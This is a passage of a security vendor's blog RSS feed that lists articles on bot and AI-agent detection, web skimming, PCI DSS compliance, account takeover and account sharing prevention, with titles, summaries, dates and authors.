2026</title><link>https://cside.com/blog/ecommerce-fraud-prevention-software</link><guid isPermaLink="true">https://cside.com/blog/ecommerce-fraud-prevention-software</guid><description>10 best ecommerce fraud prevention software platforms for 2026, scored on browser-layer evidence, false-positive cost, and PCI DSS 4.0.1 coverage.</description><pubDate>Wed, 15 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Ecommerce+Fraud+Prevention+Software%3A+10+Best+Platforms+2026&amp;bannerTitle=Ecommerce+fraud+prevention%3A+buyer%27s+guide&amp;point=Score+vendors+on+six+hard+criteria&amp;point=Demand+browser-layer+evidence" length="0" type="image/webp"/></item><item><title>Bot Detection in the Age of AI Agents: Why Legacy Tools Miss Them</title><link>https://cside.com/blog/bot-detection-ai-agents-legacy-tools</link><guid isPermaLink="true">https://cside.com/blog/bot-detection-ai-agents-legacy-tools</guid><description>Edge bot tools score IPs, user agents, and rate. AI agents beat each. A gap-by-gap look at where legacy detection breaks and what browser signals add.</description><pubDate>Tue, 14 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Bot+Detection+in+the+Age+of+AI+Agents%3A+Why+Legacy+Tools+Miss+Them&amp;bannerTitle=Why+legacy+bot+tools+miss+AI+agents&amp;point=IP+reputation+dies+on+residential+pools&amp;point=Headful+browsers+pass+UA+checks&amp;point=Browser-layer+signals+close+the+gap" length="0" type="image/webp"/></item><item><title>Detect AI agents by behavior: mouse, scroll, typing</title><link>https://cside.com/blog/catching-ai-agents-behavioral-signals</link><guid isPermaLink="true">https://cside.com/blog/catching-ai-agents-behavioral-signals</guid><description>Behavioral signals catch AI agents that pass CAPTCHA and rotate IPs: mouse paths and keystroke timing automation can&apos;t fake. See how cside scores it.</description><pubDate>Tue, 14 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Detect+AI+agents+by+behavior%3A+mouse%2C+scroll%2C+typing&amp;bannerTitle=Catch+AI+agents+by+behavior&amp;point=Mouse%2C+scroll%2C+and+typing+signals&amp;point=Catch+agents+that+pass+CAPTCHA&amp;point=Timing+automation+can%27t+fake" length="0" type="image/webp"/></item><item><title>How to Detect Account Takeover Before It Happens: Browser and Device Signals</title><link>https://cside.com/blog/detect-account-takeover-before-it-happens-browser-device-signals</link><guid isPermaLink="true">https://cside.com/blog/detect-account-takeover-before-it-happens-browser-device-signals</guid><description>Instrument browser and device signals that fire before account takeover: fingerprint drift, headless and stealth-browser tells, proxy, and velocity.</description><pubDate>Tue, 14 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+Detect+Account+Takeover+Before+It+Happens%3A+Browser+and+Device+Signals&amp;bannerTitle=Catch+ATO+before+the+login+lands&amp;point=Instrument+before+the+takeover&amp;point=Read+headless+and+stealth+tells&amp;point=Score+drift%2C+not+just+logins" length="0" type="image/webp"/></item><item><title>PCI DSS Requirement 11.6.1 Explained</title><link>https://cside.com/blog/pci-11-6-1</link><guid isPermaLink="true">https://cside.com/blog/pci-11-6-1</guid><description>What PCI DSS Requirement 11.6.1 mandates for payment page tamper detection: the control text, the 2025-03-31 deadline, and the evidence a QSA expects.</description><pubDate>Tue, 14 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=PCI+DSS+Requirement+11.6.1+Explained&amp;bannerTitle=PCI+DSS+11.6.1+explained&amp;point=What+6.4.3+and+11.6.1+actually+require&amp;point=Mandatory+since+2025-03-31&amp;point=The+evidence+each+control+produces" length="0" type="image/webp"/></item><item><title>Browser-Layer Script Activity Logging and Incident Response: Complete Guide for 2026</title><link>https://cside.com/blog/browser-script-activity-logging-incident-response</link><guid isPermaLink="true">https://cside.com/blog/browser-script-activity-logging-incident-response</guid><description>SIEM and EDR tools log the endpoint. WAFs log the network. Neither logs what third-party scripts do inside your users&apos; browsers. This guide covers what browser-layer script activity logging captures and how incident response works when a script on your site is compromised.</description><pubDate>Mon, 13 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Browser-Layer+Script+Activity+Logging+and+Incident+Response%3A+Complete+Guide+for+2026&amp;bannerTitle=Script+activity+logging+and+incident+response&amp;point=Detect+what+EDR+misses&amp;point=Log+browser-layer+execution&amp;point=Respond+before+data+leaves" length="0" type="image/webp"/></item><item><title>Magecart Attacks Explained: How Web Skimming Works in the Browser</title><link>https://cside.com/blog/magecart-attacks-explained-web-skimming</link><guid isPermaLink="true">https://cside.com/blog/magecart-attacks-explained-web-skimming</guid><description>A plain explainer of how Magecart web skimming works: how the code gets in, how it reads your form fields, and how it exfiltrates card data unseen.</description><pubDate>Mon, 13 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Magecart+Attacks+Explained%3A+How+Web+Skimming+Works+in+the+Browser&amp;bannerTitle=How+Magecart+web+skimming+works&amp;point=Inject%2C+capture%2C+exfiltrate&amp;point=Runs+entirely+in+the+browser&amp;point=Server+logs+never+see+the+theft" length="0" type="image/webp"/></item><item><title>10 Best Bot Detection Tools for 2026 (Including AI Agents)</title><link>https://cside.com/blog/bot-detection-tools</link><guid isPermaLink="true">https://cside.com/blog/bot-detection-tools</guid><description>The 10 best bot detection tools for 2026, ranked by detection layer, AI agent coverage, and false-positive rate. Head-to-head comparison of edge, device, and browser signals.</description><pubDate>Sun, 12 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=10+Best+Bot+Detection+Tools+for+2026+%28Including+AI+Agents%29&amp;bannerTitle=AI+bot+detection+by+layer&amp;point=Map+each+layer+to+what+it+can+see&amp;point=Find+the+blind+spot+before+you+buy&amp;point=Stack+edge%2C+device%2C+and+browser+signals" length="0" type="image/webp"/></item><item><title>JavaScript Security Vulnerabilities: How Obfuscated Scripts Evade CSP and How to Stop Them</title><link>https://cside.com/blog/csp-evasion-resistant-protection-obfuscated-javascript</link><guid isPermaLink="true">https://cside.com/blog/csp-evasion-resistant-protection-obfuscated-javascript</guid><description>Why CSP cannot stop obfuscated JavaScript attacks, and what browser-layer behavioral monitoring adds that source allowlists cannot.</description><pubDate>Sun, 12 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=JavaScript+Security+Vulnerabilities%3A+How+Obfuscated+Scripts+Evade+CSP+and+How+to+Stop+Them&amp;bannerTitle=Beyond+CSP%3A+stopping+obfuscated+scripts&amp;point=Three+CSP+failure+modes+for+obfuscated+code&amp;point=Browser-layer+vs+source-allowlist+controls&amp;point=Evaluation+criteria+for+evasion-resistant+tools" length="0" type="image/webp"/></item><item><title>AI Agent and Bot Detection: Telling Humans, Good Bots, and Malicious Agents Apart</title><link>https://cside.com/blog/ai-agent-bot-detection-humans-good-bots-malicious-agents</link><guid isPermaLink="true">https://cside.com/blog/ai-agent-bot-detection-humans-good-bots-malicious-agents</guid><description>A classification taxonomy and intent-based enforcement model for separating humans, good bots, and malicious agents, then deciding what each one gets.</description><pubDate>Sat, 11 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=AI+Agent+and+Bot+Detection%3A+Telling+Humans%2C+Good+Bots%2C+and+Malicious+Agents+Apart&amp;bannerTitle=Humans%2C+good+bots%2C+malicious+agents&amp;point=Classify+by+intent%2C+not+user+agent&amp;point=Allow+good+bots%2C+control+the+rest&amp;point=Map+each+class+to+one+action" length="0" type="image/webp"/></item><item><title>How AI Agents Break Account Security and How to Detect Bot-Driven ATO</title><link>https://cside.com/blog/ai-agents-break-account-security-detect-bot-driven-ato</link><guid isPermaLink="true">https://cside.com/blog/ai-agents-break-account-security-detect-bot-driven-ato</guid><description>How AI agents drive account takeover through credential replay, session and token reuse, and recovery abuse, and the browser signals that expose them.</description><pubDate>Sat, 11 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+AI+Agents+Break+Account+Security+and+How+to+Detect+Bot-Driven+ATO&amp;bannerTitle=AI+agents+and+bot-driven+ATO&amp;point=Replay%2C+token+reuse%2C+recovery+abuse&amp;point=Agents+run+real+stealth+browsers&amp;point=Browser+signals+expose+the+bot" length="0" type="image/webp"/></item><item><title>Adyen and PCI DSS: What the Processor Covers vs. What You Must Do</title><link>https://cside.com/blog/adyen-pci-dss-processor-covers-vs-what-you-must-do</link><guid isPermaLink="true">https://cside.com/blog/adyen-pci-dss-processor-covers-vs-what-you-must-do</guid><description>Map the PCI DSS 6.4.3 and 11.6.1 script-ownership boundary to each Adyen integration: Hosted Pages, Drop-in, Components, and API-only checkout flows.</description><pubDate>Fri, 10 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Adyen+and+PCI+DSS%3A+What+the+Processor+Covers+vs.+What+You+Must+Do&amp;bannerTitle=Adyen+PCI+DSS+responsibility+split&amp;point=Adyen%27s+iframe+is+not+your+whole+page&amp;point=Script+controls+stay+with+you&amp;point=Boundary+shifts+by+integration+type" length="0" type="image/webp"/></item><item><title>Formjacking vs Magecart vs Digital Skimming: What&apos;s the Difference?</title><link>https://cside.com/blog/formjacking-vs-magecart-vs-digital-skimming</link><guid isPermaLink="true">https://cside.com/blog/formjacking-vs-magecart-vs-digital-skimming</guid><description>Digital skimming is the data-theft outcome, formjacking is the capture technique, and Magecart is the threat-actor ecosystem. Here is how they relate.</description><pubDate>Fri, 10 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Formjacking+vs+Magecart+vs+Digital+Skimming%3A+What%27s+the+Difference%3F&amp;bannerTitle=Formjacking+vs+Magecart+vs+digital+skimming&amp;point=Digital+skimming+%3D+the+data-theft+outcome&amp;point=Formjacking+%3D+a+common+capture+technique&amp;point=Magecart+%3D+the+threat-actor+ecosystem" length="0" type="image/webp"/></item><item><title>How to detect multi-account fraud in fintech and SaaS: device fingerprinting beyond velocity limits</title><link>https://cside.com/blog/signup-shield-multi-account-fraud-detection</link><guid isPermaLink="true">https://cside.com/blog/signup-shield-multi-account-fraud-detection</guid><description>Velocity rules catch the obvious multi-account operator. Device fingerprinting catches the one who rotates email providers and IPs.</description><pubDate>Fri, 10 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+detect+multi-account+fraud+in+fintech+and+SaaS%3A+device+fingerprinting+beyond+velocity+limits&amp;bannerTitle=Multi-account+fraud+detection+that+works&amp;point=Catch+operators+velocity+rules+miss&amp;point=Link+accounts+across+rotated+IPs&amp;point=Spot+rotated+devices+and+emails" length="0" type="image/webp"/></item><item><title>Third-Party Script Risk Management: A Governance Framework</title><link>https://cside.com/blog/third-party-script-risk-management-framework</link><guid isPermaLink="true">https://cside.com/blog/third-party-script-risk-management-framework</guid><description>A governance framework for third-party script risk: inventory, ownership, data tiers, change monitoring, review cadence, RACI, and audit evidence.</description><pubDate>Fri, 10 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Third-Party+Script+Risk+Management%3A+A+Governance+Framework&amp;bannerTitle=Third-party+script+risk+framework&amp;point=Run+scripts+as+a+governed+program&amp;point=Owner+%2B+data+tier+on+every+script&amp;point=Evidence+that+survives+an+audit" length="0" type="image/webp"/></item><item><title>Credential Stuffing: How to Detect and Stop It at the Login</title><link>https://cside.com/blog/credential-stuffing-how-to-detect-and-stop-it</link><guid isPermaLink="true">https://cside.com/blog/credential-stuffing-how-to-detect-and-stop-it</guid><description>Credential stuffing tests breached username and password pairs at scale. Learn the login signals that expose it and the layered controls that stop it.</description><pubDate>Thu, 09 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Credential+Stuffing%3A+How+to+Detect+and+Stop+It+at+the+Login&amp;bannerTitle=Credential+stuffing%3A+detect+and+stop+it+at+the+login&amp;point=Detect+login+bursts%2C+stealth+browsers%2C+and+breached+credentials&amp;point=Stop+attacks+with+phishing-resistant+MFA+and+fingerprinting&amp;point=Browser-layer+signals+catch+AI-agent+bots" length="0" type="image/webp"/></item><item><title>Does Stripe Make You PCI Compliant? What PCI DSS 6.4.3 &amp; 11.6.1 Still Require</title><link>https://cside.com/blog/does-stripe-make-you-pci-compliant-6-4-3-11-6-1</link><guid isPermaLink="true">https://cside.com/blog/does-stripe-make-you-pci-compliant-6-4-3-11-6-1</guid><description>Stripe shrinks your PCI DSS scope and can move you to SAQ A, but it does not make your site fully compliant. Requirements 6.4.3 and 11.6.1 stay yours.</description><pubDate>Thu, 09 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Does+Stripe+Make+You+PCI+Compliant%3F+What+PCI+DSS+6.4.3+%26+11.6.1+Still+Require&amp;bannerTitle=Does+Stripe+make+you+PCI+compliant%3F&amp;point=Stripe+cuts+PCI+scope%2C+not+your+obligations&amp;point=6.4.3+and+11.6.1+stay+your+responsibility&amp;point=Monitor+every+payment-page+script+with+cside" length="0" type="image/webp"/></item><item><title>How to Block AI Content Scrapers on Your Website</title><link>https://cside.com/blog/how-to-block-ai-content-scrapers</link><guid isPermaLink="true">https://cside.com/blog/how-to-block-ai-content-scrapers</guid><description>AI scrapers harvest pricing, product data, and content at scale. Learn the signal stack that exposes them, and protect data without blocking users.</description><pubDate>Thu, 09 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+Block+AI+Content+Scrapers+on+Your+Website&amp;bannerTitle=How+to+block+AI+content+scrapers+in+2026&amp;point=robots.txt%2C+CDN%2C+and+JS+challenges&amp;point=Covers+GPTBot%2C+ClaudeBot%2C+PerplexityBot&amp;point=What+ID+checks+actually+stop+them" length="0" type="image/webp"/></item><item><title>How to convert account sharers into paying customers</title><link>https://cside.com/blog/how-to-convert-account-sharers-paying-customers</link><guid isPermaLink="true">https://cside.com/blog/how-to-convert-account-sharers-paying-customers</guid><description>Account sharers are not adversaries. They are unconverted customers who already chose your product.</description><pubDate>Thu, 09 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+convert+account+sharers+into+paying+customers&amp;bannerTitle=Convert+account+sharers+to+customers&amp;point=Sharers+are+unconverted+customers&amp;point=Turn+detection+into+conversion&amp;point=Evidence-based+upgrade+prompts" length="0" type="image/webp"/></item><item><title>How to build chargeback evidence that wins disputes: what risk scores and visitor IDs actually prove</title><link>https://cside.com/blog/chargeback-evidence-risk-scores-visitor-ids-not-enough</link><guid isPermaLink="true">https://cside.com/blog/chargeback-evidence-risk-scores-visitor-ids-not-enough</guid><description>A risk score is a model&apos;s opinion about a transaction. A visitor ID is a pseudonymous identifier.</description><pubDate>Wed, 08 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+build+chargeback+evidence+that+wins+disputes%3A+what+risk+scores+and+visitor+IDs+actually+prove&amp;bannerTitle=Chargeback+evidence+that+wins+disputes&amp;point=Go+beyond+risk+scores+and+visitor+IDs&amp;point=Proof+card+schemes+actually+accept&amp;point=Win+more+disputes+with+real+evidence" length="0" type="image/webp"/></item><item><title>Top Platforms for Detecting Autonomous AI Activity on the Web</title><link>https://cside.com/blog/top-platforms-detecting-autonomous-ai-activity-web</link><guid isPermaLink="true">https://cside.com/blog/top-platforms-detecting-autonomous-ai-activity-web</guid><description>Compare the top platforms for detecting autonomous, undeclared AI agents that browse real browser sessions with no user-agent on your live website.</description><pubDate>Wed, 08 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Top+Platforms+for+Detecting+Autonomous+AI+Activity+on+the+Web&amp;bannerTitle=Top+platforms+for+detecting+autonomous+AI+activity&amp;point=Ranks+vendors+on+agent-detection+depth&amp;point=Beyond+bot+lists%3A+LLM+behavioral+models&amp;point=Enterprise+and+SMB+tiers+compared" length="0" type="image/webp"/></item><item><title>What Is Online Card Skimming? How Attackers Steal Payment Card Data from Websites</title><link>https://cside.com/blog/what-is-online-card-skimming</link><guid isPermaLink="true">https://cside.com/blog/what-is-online-card-skimming</guid><description>Malicious JavaScript on checkout pages captures card numbers before encryption. How online card skimming works, real examples, and PCI DSS 4.0.1 requirements.</description><pubDate>Wed, 08 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+Is+Online+Card+Skimming%3F+How+Attackers+Steal+Payment+Card+Data+from+Websites&amp;bannerTitle=Online+card+skimming+explained&amp;point=Malicious+JavaScript+copies+card+numbers+before+encryption&amp;point=Conditional+payloads+hide+from+scanners%2C+fire+for+real+users&amp;point=PCI+DSS+4.0.1+%C2%A76.4.3+and+%C2%A711.6.1+mandate+detection+controls" length="0" type="image/webp"/></item><item><title>How to prevent account takeover: detecting credential attacks before they reach login</title><link>https://cside.com/blog/account-takeover-prevention-browser-layer-detection</link><guid isPermaLink="true">https://cside.com/blog/account-takeover-prevention-browser-layer-detection</guid><description>Risk engines and visitor IDs fire at the login event. The browser layer sees the attack setup before authentication starts.</description><pubDate>Tue, 07 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+prevent+account+takeover%3A+detecting+credential+attacks+before+they+reach+login&amp;bannerTitle=Account+takeover+prevention+before+login&amp;point=See+the+attack+before+the+login+event&amp;point=Catch+what+rate+limiting+misses&amp;point=Correlate+attempts+across+accounts" length="0" type="image/webp"/></item><item><title>Bot Detection Software for 2026: 12 Platforms Compared</title><link>https://cside.com/blog/bot-detection-software</link><guid isPermaLink="true">https://cside.com/blog/bot-detection-software</guid><description>Legacy bot detection and AI agent detection are not the same job. Compare which platforms cover each, by detection layer, intent, and agent trust now.</description><pubDate>Tue, 07 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Bot+Detection+Software+for+2026%3A+12+Platforms+Compared&amp;bannerTitle=Bot+detection+software+for+2026%3A+12+compared&amp;point=Legacy+bots+vs+LLM-driven+agents&amp;point=Detection+layer%2C+intent%2C+agent+trust&amp;point=Vendor+list+with+strengths+and+gaps" length="0" type="image/webp"/></item><item><title>Account sharing vs account takeover: what&apos;s the difference and why both cost you revenue</title><link>https://cside.com/blog/account-sharing-vs-account-takeover</link><guid isPermaLink="true">https://cside.com/blog/account-sharing-vs-account-takeover</guid><description>Account sharing and account takeover produce similar session signals but require completely different responses.</description><pubDate>Mon, 06 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Account+sharing+vs+account+takeover%3A+what%27s+the+difference+and+why+both+cost+you+revenue&amp;bannerTitle=Account+sharing+vs+account+takeover&amp;point=Same+signals%2C+different+response&amp;point=Browser+evidence+tells+them+apart&amp;point=Stop+both+revenue+and+security+loss" length="0" type="image/webp"/></item><item><title>AI Agent Traffic Monitoring Tools for Enterprise</title><link>https://cside.com/blog/ai-agent-traffic-monitoring-tools-enterprise</link><guid isPermaLink="true">https://cside.com/blog/ai-agent-traffic-monitoring-tools-enterprise</guid><description>How enterprise CISOs monitor, report on, and govern AI agent traffic at scale: platform comparison, browser vs network layer, SIEM, procurement.</description><pubDate>Mon, 06 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=AI+Agent+Traffic+Monitoring+Tools+for+Enterprise&amp;bannerTitle=Enterprise+AI+agent+traffic+monitoring+tools&amp;point=Session-level+visibility+for+LLM+agents&amp;point=Prompt+injection+and+scraping+signals&amp;point=Fits+SOC+and+fraud+team+workflows" length="0" type="image/webp"/></item><item><title>Headless Browser Detection: Signals, Methods, and What Works in 2026</title><link>https://cside.com/blog/headless-browser-detection</link><guid isPermaLink="true">https://cside.com/blog/headless-browser-detection</guid><description>Headless browsers power most bot attacks in 2026. Which signals catch them, why simple checks fail against stealth tooling, and what holds.</description><pubDate>Mon, 06 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Avneh Bhatia</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Headless+Browser+Detection%3A+Signals%2C+Methods%2C+and+What+Works+in+2026&amp;bannerTitle=Headless+browser+detection+in+2026&amp;point=navigator.webdriver+is+patched+-+you+need+deeper+signals&amp;point=TLS+and+rendering+fingerprints+hold+even+when+APIs+are+spoofed&amp;point=Behavioral+signals+are+the+hardest+layer+to+fake" length="0" type="image/webp"/></item><item><title>How much revenue are you losing to account sharing? Benchmarks and calculation framework</title><link>https://cside.com/blog/account-sharing-revenue-loss-benchmarks</link><guid isPermaLink="true">https://cside.com/blog/account-sharing-revenue-loss-benchmarks</guid><description>Account sharing revenue loss is calculable.</description><pubDate>Sun, 05 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+much+revenue+are+you+losing+to+account+sharing%3F+Benchmarks+and+calculation+framework&amp;bannerTitle=Your+account+sharing+revenue+loss&amp;point=Calculate+your+sharing+revenue+loss&amp;point=Benchmarks+for+SaaS+and+streaming&amp;point=Sharing+rate%2C+conversion%2C+seat+price" length="0" type="image/webp"/></item><item><title>How to stop account sharing on streaming and OTT platforms</title><link>https://cside.com/blog/account-sharing-prevention-streaming-ott</link><guid isPermaLink="true">https://cside.com/blog/account-sharing-prevention-streaming-ott</guid><description>Password sharing enforcement on streaming platforms has become a mainstream conversation since Netflix&apos;s crackdown.</description><pubDate>Sat, 04 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+stop+account+sharing+on+streaming+and+OTT+platforms&amp;bannerTitle=Stop+account+sharing+on+streaming&amp;point=Detect+out-of-household+sharing&amp;point=No+friction+for+real+households&amp;point=Evidence-based+upgrade+prompts" length="0" type="image/webp"/></item><item><title>What Is Impossible Travel Detection and How Does It Work?</title><link>https://cside.com/blog/what-is-impossible-travel-detection</link><guid isPermaLink="true">https://cside.com/blog/what-is-impossible-travel-detection</guid><description>Impossible travel detection flags sessions where location jumps faster than physically possible. Learn how it works and what the browser layer adds.</description><pubDate>Sat, 04 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+Is+Impossible+Travel+Detection+and+How+Does+It+Work%3F&amp;bannerTitle=Impossible+Travel+Detection+Explained&amp;point=Catches+what+IP+checks+miss&amp;point=Handles+VPNs+and+device+drift&amp;point=Scores+sessions%2C+not+just+logins" length="0" type="image/webp"/></item><item><title>How to prevent account sharing in SaaS: device fingerprinting vs session controls vs concurrent limits</title><link>https://cside.com/blog/account-sharing-prevention-saas</link><guid isPermaLink="true">https://cside.com/blog/account-sharing-prevention-saas</guid><description>Every shared SaaS seat is lost ARR. Session controls slow the leak; device fingerprint history closes it.</description><pubDate>Fri, 03 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+prevent+account+sharing+in+SaaS%3A+device+fingerprinting+vs+session+controls+vs+concurrent+limits&amp;bannerTitle=Account+sharing+prevention+for+SaaS&amp;point=Every+shared+seat+is+lost+ARR&amp;point=Detect+time-staggered+sharing&amp;point=Convert+sharers+into+paid+seats" length="0" type="image/webp"/></item><item><title>How to stop account sharing on online learning platforms: detecting credential sharing without blocking enrolled students</title><link>https://cside.com/blog/account-sharing-prevention-online-education-platforms</link><guid isPermaLink="true">https://cside.com/blog/account-sharing-prevention-online-education-platforms</guid><description>Online learning platforms see high rates of credential sharing driven by cost sensitivity. Concurrent session limits miss the most common pattern.</description><pubDate>Thu, 02 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+stop+account+sharing+on+online+learning+platforms%3A+detecting+credential+sharing+without+blocking+enrolled+students&amp;bannerTitle=Stop+sharing+on+learning+platforms&amp;point=Detect+credential+sharing+at+scale&amp;point=Never+block+enrolled+students&amp;point=14-day+device+fingerprint+history" length="0" type="image/webp"/></item><item><title>How to bypass Reddit bot detection (and where behavioral defense still holds)</title><link>https://cside.com/blog/how-to-bypass-reddit-bot-detection</link><guid isPermaLink="true">https://cside.com/blog/how-to-bypass-reddit-bot-detection</guid><description>We built human_nav, an RL tool that moves like a hand to stress-test behavioral bot detection. Learned motion beats geometry, not a moving detector.</description><pubDate>Thu, 02 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Avneh Bhatia</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+bypass+Reddit+bot+detection+%28and+where+behavioral+defense+still+holds%29&amp;bannerTitle=How+to+bypass+Reddit+bot+detection&amp;point=Off-the-shelf+humanizers%3A+caught+97-100%25&amp;point=Learned+RL+motion+reaches+the+human+band&amp;point=A+drifting+detector+still+wins" length="0" type="image/webp"/></item><item><title>Which Client-Side Security Tools Give Real-Time Browser Attack Visibility?</title><link>https://cside.com/blog/real-time-browser-attack-visibility-tools</link><guid isPermaLink="true">https://cside.com/blog/real-time-browser-attack-visibility-tools</guid><description>Real-time browser attack visibility needs session monitoring, behavioural deviation detection, and sub-minute change detection. Six tools evaluated.</description><pubDate>Thu, 02 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Which+Client-Side+Security+Tools+Give+Real-Time+Browser+Attack+Visibility%3F&amp;bannerTitle=Real-time+browser+attack+visibility+tools&amp;point=Client-side+events%2C+session-level+detail&amp;point=Detects+Magecart+and+formjacking+live&amp;point=Fits+SOC+playbooks+and+QSA+evidence" length="0" type="image/webp"/></item><item><title>How to stop account sharing in hotel loyalty programmes: detecting credential misuse without blocking family accounts</title><link>https://cside.com/blog/account-sharing-prevention-hospitality-loyalty</link><guid isPermaLink="true">https://cside.com/blog/account-sharing-prevention-hospitality-loyalty</guid><description>Hotel loyalty programmes lose points revenue and status benefit value to three distinct sharing patterns.</description><pubDate>Wed, 01 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+stop+account+sharing+in+hotel+loyalty+programmes%3A+detecting+credential+misuse+without+blocking+family+accounts&amp;bannerTitle=Account+sharing+in+hotel+loyalty&amp;point=Protect+points+and+status+value&amp;point=Household+vs+out-of-household&amp;point=No+friction+for+real+travellers" length="0" type="image/webp"/></item><item><title>Catching Playwright and browserless bots by how the cursor moves</title><link>https://cside.com/blog/catching-playwright-and-browserless-bots-by-the-cursor</link><guid isPermaLink="true">https://cside.com/blog/catching-playwright-and-browserless-bots-by-the-cursor</guid><description>Real catch rates on Playwright-driven mouse movement and browserless.io&apos;s humanlike API, caught on desktop from cursor motion alone.</description><pubDate>Wed, 01 Jul 2026 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Avneh Bhatia</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Catching+Playwright+and+browserless+bots+by+how+the+cursor+moves&amp;bannerTitle=The+cursor+gives+the+bot+away&amp;point=Raw+Playwright+caught+98%25+cold&amp;point=Humanizers+barely+move+the+number&amp;point=browserless+humanlike%3A+100%25+caught" length="0" type="image/webp"/></item><item><title>Account sharing prevention in healthcare: protecting patient portal credentials and HIPAA compliance</title><link>https://cside.com/blog/account-sharing-prevention-healthcare</link><guid isPermaLink="true">https://cside.com/blog/account-sharing-prevention-healthcare</guid><description>Healthcare credential sharing is not a revenue problem. It is a compliance problem.</description><pubDate>Tue, 30 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Account+sharing+prevention+in+healthcare%3A+protecting+patient+portal+credentials+and+HIPAA+compliance&amp;bannerTitle=Patient+portal+sharing+%26+HIPAA&amp;point=A+compliance+risk%2C+not+revenue&amp;point=Protect+patient+portal+access&amp;point=Cookieless%2C+fits+HIPAA+environments" length="0" type="image/webp"/></item><item><title>Best Client-Side Monitoring Platforms for Fintech in 2026</title><link>https://cside.com/blog/best-client-side-monitoring-platform-fintech</link><guid isPermaLink="true">https://cside.com/blog/best-client-side-monitoring-platform-fintech</guid><description>Fintech faces PCI DSS 4.0.1, GDPR, and financial PII risks general client-side security tools are not built for. Five platforms reviewed for 2026.</description><pubDate>Tue, 30 Jun 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike 